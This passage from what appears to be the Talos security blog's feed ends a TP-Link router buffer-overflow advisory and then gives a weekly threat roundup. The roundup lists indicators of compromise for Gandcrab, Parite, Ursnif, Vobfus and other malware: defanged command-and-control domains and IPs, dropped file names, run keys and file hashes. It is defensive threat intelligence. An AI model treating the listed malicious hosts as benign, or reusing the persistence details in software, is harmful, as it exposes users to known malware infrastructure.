code execution on the device. During this process, the server calculates the length of the user-controlled HTTP header buffer and adds the value to the input buffer offset. This creates an overflow condition when the router processes a longer-than-expected GET request. An attacker needs to be authenticated to be able to trigger this vulnerability.<br /><br />CVE: CVE-2018-3951<br /><br />A full technical advisory is available <a href="https://talosintelligence.com/vulnerability_reports/TALOS-2018-0620">here</a>.<br /><br /><h2>Discussion</h2><br />Over the past year, Talos has disclosed various vulnerabilities in internet-of-things (IoT) devices and SOHO routers. These are just the latest example that these pieces of equipment are not only vulnerable, they also lack the generic operating systems protections that mitigate vulnerabilities like buffer overflows. Fortunately in the case of TL-R600VPN routers, the critical vulnerabilities that lead remote code execution need authentication. However, the code could be executed with root privileges.<br /><br /><a href="http://3.bp.blogspot.com/-dOUdAKn0kko/W_LMi0_j5uI/AAAAAAAAEpk/hvKaeSGCOnA4CAwr9SdyT5cDlnhtpuqKACK4BGAYYCw/s1600/patch_availability_available.jpg" imageanchor="1"><img border="0" height="128" src="https://3.bp.blogspot.com/-dOUdAKn0kko/W_LMi0_j5uI/AAAAAAAAEpk/hvKaeSGCOnA4CAwr9SdyT5cDlnhtpuqKACK4BGAYYCw/s640/patch_availability_available.jpg" width="640" /></a><br /><h2>Coverage</h2><br />The following Snort IDs have been released to detect these vulnerabilities:<br /><br /><ul><li><a href="https://snort.org/advisories/577">47039-47040</a></li><li><a href="https://snort.org/advisories/577">47037</a></li><li><a href="https://snort.org/advisories/577">47062</a></li></ul></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/Fl3lfhKMbXM" height="1" width="1" alt=""/>2018-12-13T14:21:57.991-05:000https://blog.talosintelligence.com/2018/11/tplinkr600.htmlThreat Roundup for Nov. 9 to Nov. 16http://feedproxy.google.com/~r/feedburner/Talos/~3/heeAUQuVzwQ/threat-roundup-1109-1116.htmlAMPCoverageThreat RoundupThreatGridUmbrellanoreply@blogger.com (William Largent)Fri, 16 Nov 2018 11:20:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-848578596441048317<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABU/LKehnkoxdbQOVRk2Nl5tvFBv3ogo-VzogCPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABU/LKehnkoxdbQOVRk2Nl5tvFBv3ogo-VzogCPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" /></a></div><br />Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 09 and Nov. 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.<br /><br />As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.<br /><a name='more'></a><br />You can find an additional JSON file <a href="https://alln-extcloud-storage.cisco.com/ciscoblogs/5bef0395049e0.txt">here</a> that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.<br /><br />The most prevalent threats highlighted in this roundup are:<br /><br /><ul><li><b>Win.Ransomware.Gandcrab-6748603-0</b><br /> Ransomware<br /> Gandcrab is ransomware that encrypts documents, photos, databases and other important files using the file extension ".GDCB", ".CRAB" or ".KRAB." It's spread through traditional spam campaigns, as well as multiple exploit kits, including Rig and Grandsoft.<br />&nbsp;</li><li><b>Win.Virus.Parite-6748128-0</b><br /> Virus<br /> Parite is a polymorphic file infector. It infects executable files on the local machine and on network drives.<br />&nbsp;</li><li><b>Win.Malware.Dijo-6748031-0</b><br /> Malware<br /> Win.Malware.DIJO, also known as Ursnif, is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.<br />&nbsp;</li><li><b>Win.Malware.Vobfus-6747720-0</b><br /> Malware<br /> Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will run when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers.<br />&nbsp;</li><li><b>Win.Downloader.Upatre-6746951-0</b><br /> Downloader<br /> Upatre is a malicious downloader often used by exploit kits and phishing campaigns. Upatre downloads and executes malicious executables, such as banking malware.<br />&nbsp;</li><li><b>Win.Malware.Emotet-6745295-0</b><br /> Malware<br /> Emotet is a banking trojan that has remained relevant due to its continual evolution to bypass antivirus products. It is commonly spread via malicious emails.<br />&nbsp;</li></ul><hr /><h2>Threats</h2><h3>Win.Ransomware.Gandcrab-6748603-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>Global\pc_group=WORKGROUP&amp;ransom_id=4a6a799098b68e3c</li><li>\BaseNamedObjects\Global\pc_group=WORKGROUP&amp;ransom_id=ab8e4b3e3c28b0e4</li><li>Global\7bf1bf81-e78a-11e8-a007-00501e3ae7b5</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>66[.]171[.]248[.]178</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>ipv4bot[.]whatismyipaddress[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>%AllUsersProfile%\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_d19ab989-a35f-4710-83df-7b2db7efe7c5</li><li>%AppData%\Microsoft\umitoa.exe</li><li>%AppData%\Microsoft\hhbbvc.exe</li><li>\Win32Pipes.000006c8.00000045</li><li>\Win32Pipes.000006c8.00000047</li><li>\Win32Pipes.000006c8.00000049</li></ul><b>File Hashes</b><br /><ul><li>008e2453c3bba10629ae8f7f32c6377d91bd17326da52295f038d7badd53cf4f</li><li>00f07cc799aabac7449a324ff47161a6a34ad02ba4b2074ddb382152d383ed14</li><li>02edf037074ebd2445625737108f7337715a6af17ec161429fa0392894e479bd</li><li>04196939eee8a21a4480a5e5bcf34f70b20f1dad9c3038bc632a415130ac47e8</li><li>043f30bd958e54d6947631c10d70ddec772ababd8a3852ceb0e646e87d670a92</li><li>051f4d57fc51e1491eb9121cb6ecdd036e140103f1afbc73fe9cef9a4fd67a84</li><li>06cafb061ce341647e48d4113eb71bed76290d30d54ce6d98169fcfe8bbe83c5</li><li>0799d33c49bceeeeb9c92077d448d5823ab8e71a04b71c6b8afa7f386fb5aa92</li><li>08d56fc6c0622c2e931f04eb8c68a25fa431ac4833b1cbd7e44847d55f7f26e1</li><li>09abf839c42200b000d3065d2cda41d858be415a521a5cb2b77b6e62503ae460</li><li>0a48f61677791bca8d2553662ec6bce8acfdb3249cfcabac2802ba216ac54262</li><li>0acc350e791e4201a7dd17e389ba8e03264343020432389d3e1b9d08874005af</li><li>0b3e086550e4baaa05c69777d484b9b20773b01d5c6da124197eff423b798b04</li><li>0dd771fecae00517f9297e21a42956d2ee113f6f0bc4d3ee277f887721efc19a</li><li>0f2784bc6fb959eace7e44fd19fd08fbfa39af04b4f793241c3eddd4183dbe71</li><li>0f50d6433d2a79f30c2417fc434098d029eceedf3acd405901d3951208be2ae7</li><li>10b5897f820d7ae3fe0194b8969c42c5c5de6cc658baf95699f8a781e18237ff</li><li>130f32c65f3f2e67bdc228f125bc07c049f40fae04114b0de920e9fd0b00bccf</li><li>13ab0a6dcd3cfd5136b54d11739169917df37a5681189baf92c4c6b0a2df0bc9</li><li>13ccda5af78a1dea028d076418db880ab3734c745f068d2c4df5de4d4968b478</li><li>14094b6a6ba1af401829963ce991e02c0eb9da885eb3837cec88f1559e2007c6</li><li>166627c9ad4fb0acb0bec8e09e1d4ceedc3110e7cdbaa709322d0dbe41a2f70f</li><li>17b78d2828794c9612cc87b09b7254c32c810134e5d06742058c55ec55ddb746</li><li>19b4d752b0be5e81c835bd3b87f3c1124c208ba6adb2150f7b85a1b76222350f</li><li>1ac89466a2668afd8d06d0f9345d48151dc2978b81985070bb23e30a767bd71c</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-oncQnM6w9_4/W-8LTtjbNtI/AAAAAAAABKM/G00vwF_ccqMd_jYVwGp-Sn2x2yJcIU4TwCLcBGAs/s1600/00f07cc799aabac7449a324ff47161a6a34ad02ba4b2074ddb382152d383ed14_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://3.bp.blogspot.com/-oncQnM6w9_4/W-8LTtjbNtI/AAAAAAAABKM/G00vwF_ccqMd_jYVwGp-Sn2x2yJcIU4TwCLcBGAs/s400/00f07cc799aabac7449a324ff47161a6a34ad02ba4b2074ddb382152d383ed14_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-bYYTlT4LWOU/W-8LYT9ZfvI/AAAAAAAABKQ/w5nkwQ_RySIjo8NsfgncRbprWhn3w4SOACLcBGAs/s1600/0f2784bc6fb959eace7e44fd19fd08fbfa39af04b4f793241c3eddd4183dbe71_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-bYYTlT4LWOU/W-8LYT9ZfvI/AAAAAAAABKQ/w5nkwQ_RySIjo8NsfgncRbprWhn3w4SOACLcBGAs/s640/0f2784bc6fb959eace7e44fd19fd08fbfa39af04b4f793241c3eddd4183dbe71_tg.png" width="640" /></a></div><br /><br /><h3>Win.Virus.Parite-6748128-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>Residented</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>%AppData%\Wplugin.dll</li><li>%WinDir%\Wplugin.dll</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\yma1.tmp</li><li>%LocalAppData%\Temp\neb2886.tmp</li></ul><b>File Hashes</b><br /><ul><li>00ad96301d29476dba58c071ef5bc4cf5eb265e9181a1d866bcacfe847199f64</li><li>01edcc04020177e2f31b13d9f6a46db2e058028011151850b0802394ccda8d77</li><li>05f816442e9d1d18a80233674af70d0ce6e17d10768d8f0e77973566b07aba8e</li><li>0e70c57c577078b1c9cab7d6bd1215372330548ae0c20ff2b80f0cb86cde2074</li><li>115995a5dc32df9da2f214cf9f4f81341daf7bc101c1b9346bead99428acb15e</li><li>145c7866de76f33e571f19a1a40c2e12c900a6a1ad9bac30b46dcdc28be6feec</li><li>14ac990a0affb831e4dccee45cff19e8a7c28dc5b93f731131ffa1c319e43823</li><li>15c7b9a2c4688af296b57ac418f01347c8fbbd74ac5fbcae17c90f9bcdfb8e26</li><li>16ee4360c7d1b78da48d06889177668120dfcaf62745bbc8c88d7864d28ba43d</li><li>1817a467dba009e325a1c8bbaa5c274ec80856f8936321980fee86a0e33a34cd</li><li>181dd25663e2628e56410e65b57677f5f3346866ccb737aa2eab8dd7376a11af</li><li>1c8698e1bd9fa33f8f664a0a12e90db53e91e31414cd307c21575a5d039b0d32</li><li>1eece81891ab4f4836931f8b1bc630e044d08ed659797dc19afc3bebd3b2b259</li><li>1fa3b372ec521a5b57a52d8b6a5ec8de67f5d8f80e87835b67b4916d4e5dd415</li><li>29f37223352f9584de101958ce00b41c3c66d9cfb15cc27d22a67df2c9dcd53e</li><li>2aea31075160d93b13bb726dc95b2a46505deefa529f8c9edfd9f6ecd8d80a37</li><li>300655178fabae5c65e48307fef7de67100b7d866b118f1ca0f0919de7e3a490</li><li>35270fa68190eba46f59bba10c8dce3a03e55d8af7e8a33f9a330e077f63aeff</li><li>39cb46a92889429d3dfc422381b46d04f9e69af0a088eec656845f184ed0b8f2</li><li>3b6a4dbf9a923ac935f6f671b38de0ed83da428b74dea48efa180365a507e13f</li><li>452ce18b59c1ab0cb4925435edf60edcfc5114cdea15056702e69c45af5763a2</li><li>4e38b473973bce00cf5f60b545327db9c9e8b17225262e88d13299f6abf579f2</li><li>51a323f3b47edc969017af5b31d364d4f23574471a52511970aaf54a8c34c382</li><li>51bbe9d3ae4bd23f31fd90ddf0d8af295ca98773653a16c2bb5a950670352888</li><li>525bc89d56339ce9423aae276228a8b879d7156ecadff7054a397a8d5178f5f0</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-dMfTeSFpblE/W-8LnUJ_J6I/AAAAAAAABKY/CfrrO_BYCcktPRB6w54FrIeTA-WHyHzCwCLcBGAs/s1600/2aea31075160d93b13bb726dc95b2a46505deefa529f8c9edfd9f6ecd8d80a37_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-dMfTeSFpblE/W-8LnUJ_J6I/AAAAAAAABKY/CfrrO_BYCcktPRB6w54FrIeTA-WHyHzCwCLcBGAs/s400/2aea31075160d93b13bb726dc95b2a46505deefa529f8c9edfd9f6ecd8d80a37_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-MHV_27INnoE/W-8LtJ_QjcI/AAAAAAAABKg/xx8OmtGEjUIcKz2LXuI4ipQCu_lMEz_kACLcBGAs/s1600/0e70c57c577078b1c9cab7d6bd1215372330548ae0c20ff2b80f0cb86cde2074_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="539" data-original-width="962" height="358" src="https://1.bp.blogspot.com/-MHV_27INnoE/W-8LtJ_QjcI/AAAAAAAABKg/xx8OmtGEjUIcKz2LXuI4ipQCu_lMEz_kACLcBGAs/s640/0e70c57c577078b1c9cab7d6bd1215372330548ae0c20ff2b80f0cb86cde2074_tg.png" width="640" /></a></div><br /><br /><h3>Win.Malware.Dijo-6748031-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>95[.]181[.]198[.]115</li><li>192[.]162[.]244[.]171</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>resolver1[.]opendns[.]com</li><li>222[.]222[.]67[.]208[.]in-addr[.]arpa</li><li>myip[.]opendns[.]com</li><li>www[.]bing[.]com</li><li>hq92lmdlcdnandwuq[.]com</li><li>cyanteread[.]com</li><li>tmencedfur[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\RESB9BE.tmp</li><li>%LocalAppData%\Temp\CSCE580781F303F45AE9F8858B262C2D7E7.TMP</li><li>%LocalAppData%\Temp\9DF6.bin</li><li>%LocalAppData%\Temp\CB8E.bin</li><li>%LocalAppData%\Temp\3F14.bi1</li><li>%LocalAppData%\Temp\RESBCAB.tmp</li><li>%LocalAppData%\Temp\CSC8B3FB8E53BAD4C5CA67A2B1CAEA0ABB3.TMP</li><li>%LocalAppData%\Temp\5mq30dkw.2sp.psm1</li><li>%LocalAppData%\Temp\jrz15mzo.uwv.ps1</li><li>%LocalAppData%\Temp\lajoenvy.0.cs</li><li>%LocalAppData%\Temp\lajoenvy.cmdline</li><li>%LocalAppData%\Temp\lajoenvy.dll</li><li>%LocalAppData%\Temp\lajoenvy.err</li><li>%LocalAppData%\Temp\lajoenvy.out</li><li>%LocalAppData%\Temp\lajoenvy.tmp</li></ul><b>File Hashes</b><br /><ul><li>0024d14e96fc79b1f7fd052945424e685843a48b1124f2b19b3a0b00570fb716</li><li>004a4d3772f1253ed309ce48cdefb8358c7500b91b7fc1a548dd32af03f8178d</li><li>00f9d43bdeb5c30acc9e5594c0ff1bd29b52efdcaa63bb8eba745342c165f856</li><li>0169eb0d2386671d1929cf74456a32da1758d8c177b4dadbb5c1998768eee892</li><li>016ef438660d7acbe94a229f0680b154bb963bc9dbc56eed7450dab36d486c01</li><li>01aa3a5ab9590ff079a13d66f67d40b441ab171d2a6ead0df5453b2d3b55888d</li><li>01e4c31f4836784dc4d297c4ba6e8f680216693735339022e11669960b929dcc</li><li>020c8eff9905e60c6bba7ff500dd0097b0b3017cfa33712a74ff23062c539520</li><li>0326d68f08fc899cd8bb7f1a9c1d7df50bc5b979e0f7d2532904a419ab1b7160</li><li>033370dfd1d35bc66ed5abf0e6f6ff214c9e1e25196fef04679f18875b0b683c</li><li>0383644a89640bbccf401520a918b54920f038e04ec0b0ae0d5aa53c45c08705</li><li>03d315458bfc34d01d2e058b6aa772c7fcd294f3dbcd821f71249675da00d94e</li><li>03df086184a6b1b146858ea3cef951dc9c3bf6148a26740a74e2384f5cc4a256</li><li>03e17ccdc6dfa104759f6d08c38a1ee96fd9cb161600fb5446b61132e4d9bd3d</li><li>04abd09ae808338d64a59fedb49dd5af79599cb9e990c2eab869d1afb25285a1</li><li>04ef397e7e52f4c71553f5eb2d4bc1971d2eda8a54eafa5a23aae4700264688d</li><li>05a5bbabbab5444214ce70c1190f41ccef8ef3dee786d1821d26a396d8a49eb5</li><li>07b911ca945371e153a661cc0d3dc04a41e75075b184eeba26a82c6a945a82e2</li><li>0879b668fbfac129d1c21076fc5826d46323398a3bcd327e4012be584778a446</li><li>095114cf4e2a81c44821a1ad9d4ea632e8cf17cf35a5cabc65813a29bcc41157</li><li>0a088fe8df26a9a2cd4330224134e1ea0d249300cbce0eaf11fc6f70b75f21f1</li><li>0ad6e9f9cd8e64c8ec265d258407f627fb1a872d13bd9cb577ad5e100633f492</li><li>0b438e78bb3fe8bffc8f5f1453f318efe177c97d9e4f0ba7e26969a60671a67e</li><li>0b4d5c0751ead190373484f7b4d8f0d7e5de5ade613b888712b92947fc173a6a</li><li>0d1b953aa006b38c0140f3a2bacda47a28262d54d5676aeeaf432235e356a5bd</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-7kBGH7fEMJU/W-8L4WdgPzI/AAAAAAAABKk/rMVJdQLknr0pHG6rQaeUdRXT5-hQwTRpwCLcBGAs/s1600/07b911ca945371e153a661cc0d3dc04a41e75075b184eeba26a82c6a945a82e2_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-7kBGH7fEMJU/W-8L4WdgPzI/AAAAAAAABKk/rMVJdQLknr0pHG6rQaeUdRXT5-hQwTRpwCLcBGAs/s400/07b911ca945371e153a661cc0d3dc04a41e75075b184eeba26a82c6a945a82e2_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-xjuZioJP6CI/W-8L-Efy9sI/AAAAAAAABKs/oLZZnbOEA7USBYkNKxzeZmIagkpax2iAgCLcBGAs/s1600/176c6b349ca3812e39b29ae3b2370c91448d2b3808295fbb87d96d7a73698613_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-xjuZioJP6CI/W-8L-Efy9sI/AAAAAAAABKs/oLZZnbOEA7USBYkNKxzeZmIagkpax2iAgCLcBGAs/s640/176c6b349ca3812e39b29ae3b2370c91448d2b3808295fbb87d96d7a73698613_tg.png" width="640" /></a></div><b><br /></b><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-t_th9TOBm_o/W-8MCytnrSI/AAAAAAAABKw/sbPgXNjusiYJZQ27VwymHA-X08Zjgiy0ACLcBGAs/s1600/176c6b349ca3812e39b29ae3b2370c91448d2b3808295fbb87d96d7a73698613_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://4.bp.blogspot.com/-t_th9TOBm_o/W-8MCytnrSI/AAAAAAAABKw/sbPgXNjusiYJZQ27VwymHA-X08Zjgiy0ACLcBGAs/s640/176c6b349ca3812e39b29ae3b2370c91448d2b3808295fbb87d96d7a73698613_umbrella.png" width="640" /></a></div><br /><br /><h3>Win.Malware.Vobfus-6747720-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKCU&gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN <ul><li>Value Name: muehe</li></ul></li></ul><b>Mutexes</b><br /><ul><li>\BaseNamedObjects\A</li><li>A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>ns1[.]chopsuwey[.]org</li><li>ns1[.]chopsuwey[.]biz</li><li>ns1[.]chopsuwey[.]info</li><li>ns1[.]chopsuwey[.]com</li><li>ns1[.]chopsuwey[.]net</li></ul><b>Files and or directories created</b><br /><ul><li>\??\E:\autorun.inf</li><li>\autorun.inf</li><li>\??\E:\System Volume Information.exe</li><li>\System Volume Information.exe</li><li>\$RECYCLE.BIN.exe</li><li>\??\E:\$RECYCLE.BIN.exe</li><li>\Secret.exe</li><li>\??\E:\Passwords.exe</li><li>\??\E:\Porn.exe</li><li>\??\E:\Secret.exe</li><li>\??\E:\Sexy.exe</li><li>\??\E:\x.mpeg</li><li>\Passwords.exe</li><li>\Porn.exe</li><li>\Sexy.exe</li><li>%SystemDrive%\Documents and Settings\Administrator\sauuyi.exe</li><li>%UserProfile%\muehe.exe</li><li>\??\E:\RCXFF.tmp</li><li>\??\E:\muehe.exe</li><li>\RCXFBD0.tmp</li><li>\RCXFF.tmp</li><li>\muehe.exe</li></ul><b>File Hashes</b><br /><ul><li>010054eb95e98fdfea1f1164b12a5dcf475f0ffcc16dc18c276553d4bce3e39c</li><li>01cdf16c052bd4d6e8f50d0447f0570b6e42727cbb3dcebed6e20766a0599854</li><li>02785ab8fe2473f20ea32dad5908f6b8831d603c26db26e67e8b3d1daefd4544</li><li>0293926921291e6700eddb633fe22ac136735ace9170e6c502be52039d3e7488</li><li>02f72dfcc27501cd1a44b3a0eed9e41831f745fc26d6b7d1526c151c94d58333</li><li>0572a5a7f2888736e647fccbd2d4ed051bb038b82d3d53fb899dcde836922fc2</li><li>0581546a844cf13d0f0c494c9cda7eb7a71a5dbea4abbd8ddb917fe00665965b</li><li>06383e4b2c2a596732f85ce8028c5b1c0a60c82e75bbb75358bcd8498b6b4b03</li><li>080d08b5202a6da7052a3256c1863db41121881d75188ad96b9af9ab5932a97e</li><li>08293e6522e8888ce18400e0c3d6e6ac1319e80bd99ffd24b8e7845fca091cf5</li><li>08c0cc2e37a1fbc8f84c932a7cb2bc9a3d3f78a4ce086c1286cb3d335619f9ff</li><li>0b2752012a9e104641af14d60987db12a41d39401ac46584b6e9125ed5d0c198</li><li>0bcd28d3d84c7518df94abbb5a8153a345121d1d126fc9dc4624259de02a41ab</li><li>0c45087137456380ec673b12d06310d8d753be92a3009bcec94ec4ebc2140bb7</li><li>0ceecae1d802f19881b04e6f97af98b5039f2b8ccd538c293d66de93d8d77964</li><li>0d9a84172a0f96b340eb3f6bd45ca30dbe6c20180f9dae75cb135d0d8b6ffa38</li><li>0db0feea81c1b211fbae852151734fca8fb423102cb953dafb3c188f40491482</li><li>0ea8e078ab8b42d97148b488fb1ad7d21972c37fdac7befc7d462ee7be3acb84</li><li>0feb943bda713bb872c82a94bceb10acd11a1ec0cd2997236dc17da24b646288</li><li>121a6b3a8000948f073e3660ecafb19bf5d204a9d468112575afd15c39222eb1</li><li>12fc93e4e1c01ce7e3670138d50aa26e5c3d77f3c42da0dc3bd7bbae57359dc4</li><li>133fea888e19e34c7703b38194ec08360ce8d697d7aec79da979a35072adce02</li><li>145fe07226fb8eb92f609f16f7044ae5a529433730d285ca7c33b9cff6b86b71</li><li>1551de875bb37b13c332d5b67ed64026c477f21bbcc6ad3d50ba8b3b8702ee5f</li><li>18ee7ed2c61ee532f9a42d02c3c53b017496071608324361117514bdd3fdcade</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-EeEdGZBuT74/W-8MTmK7HYI/AAAAAAAABLA/6-mHHnopTIQ1DyWoRMrhdPPl6Na0tiD7ACLcBGAs/s1600/0572a5a7f2888736e647fccbd2d4ed051bb038b82d3d53fb899dcde836922fc2_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-EeEdGZBuT74/W-8MTmK7HYI/AAAAAAAABLA/6-mHHnopTIQ1DyWoRMrhdPPl6Na0tiD7ACLcBGAs/s400/0572a5a7f2888736e647fccbd2d4ed051bb038b82d3d53fb899dcde836922fc2_amp.png" width="400" /></a></div><b><br /></b><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-KoKC1Yoz-2U/W-8MYZmuSoI/AAAAAAAABLE/JxDW9qHlNcQQ9h2Fg4ki5hWp1Yyx-MMXACLcBGAs/s1600/02785ab8fe2473f20ea32dad5908f6b8831d603c26db26e67e8b3d1daefd4544_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://4.bp.blogspot.com/-KoKC1Yoz-2U/W-8MYZmuSoI/AAAAAAAABLE/JxDW9qHlNcQQ9h2Fg4ki5hWp1Yyx-MMXACLcBGAs/s640/02785ab8fe2473f20ea32dad5908f6b8831d603c26db26e67e8b3d1daefd4544_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-7J0i2oHHKro/W-8MeYQ1zEI/AAAAAAAABLI/lSlJjDmyM6ULuM9WU8PMfeOsx_CKTUfPwCLcBGAs/s1600/010054eb95e98fdfea1f1164b12a5dcf475f0ffcc16dc18c276553d4bce3e39c_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" 